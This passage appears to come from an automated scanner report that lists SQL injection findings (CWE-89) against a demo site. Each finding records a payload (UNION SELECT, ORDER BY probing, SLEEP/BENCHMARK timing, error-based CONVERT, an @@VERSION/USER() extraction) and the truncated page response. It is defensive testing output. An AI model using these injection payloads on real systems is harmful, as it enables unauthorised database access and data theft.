\"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1292\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1293Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1294\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' GROUP BY 1,2,--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1295\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1296\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1297\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# RLIKE (SELECT (CASE WHEN (4346=4347) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1298\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 31337--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1299\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1300\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1301\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1302\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1303\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1304\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# -1 UNION SELECT 1 INTO @,@,\n@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1305\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- 